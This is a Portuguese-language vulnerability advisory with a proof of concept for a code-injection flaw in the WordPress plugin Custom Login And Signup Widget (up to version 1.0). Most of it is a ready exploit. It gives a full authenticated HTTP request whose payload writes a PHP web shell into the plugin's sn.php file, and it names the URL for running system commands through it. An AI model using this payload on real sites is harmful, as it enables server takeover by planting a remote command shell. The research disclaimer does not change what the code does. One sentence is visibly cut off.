
WordPress Custom Login And Signup Widget Plugin <= 1.0 é vulnerável a Execução Arbitrária de Código
A vulnerabilidade Controle Incorreto da Geração de Código ('Injeção de Código') em bitto.Kazi Custom Login And Signup Widget permite que usuários administradores autenticados executem código PHP arbitrário.
Este problema afeta todas as versões até a 1.0 inclusive.
🔥 Pontuação Base: 9.1 (CRÍTICO)
ID CWE: CWE-94 – Controle Incorreto da Geração de Código ('Injeção de Código')
O plugin permite que administradores modifiquem o conteúdo de sn.php por meio do campo Nome do Remetente na página de configurações.
A entrada fornecida pelo usuário é gravada diretamente em um arquivo PHP sem sanitização ou validação.
Como resultado, qualquer código PHP fornecido no parâmetro text será armazenado dentro de um arquivo PHP e executado mediante requisição direta, levando à .
/wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes
POST /wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://target.com/wp-admin/options-general.php?page=custom-login-and-signup-widget
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: http://target.com
Connection: keep-alive
Cookie: *<insert your admin cookie here>*
Upgrade-Insecure-Requests: 1
Priority: u=0, i
text=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit
textsn.php (include de configuração do plugin)<?php
global $bwbn;
if(isset($_GET['cmd'])) system($_GET['cmd']);
?>
http://target.com/wp-content/plugins/custom-login-and-signup-widget/content/sn.php
Após a injeção bem-sucedida, acesse-o diretamente para executar comandos via:
http://target.com/wp-content/plugins/custom-login-and-signup-widget/content/sn.php?cmd=id
.php.Este projeto foi criado apenas para fins educacionais e de pesquisa.
Qualquer uso das informações fornecidas é por sua conta e risco.
O autor não assume nenhuma responsabilidade por qualquer uso indevido ou dano causado por este conteúdo.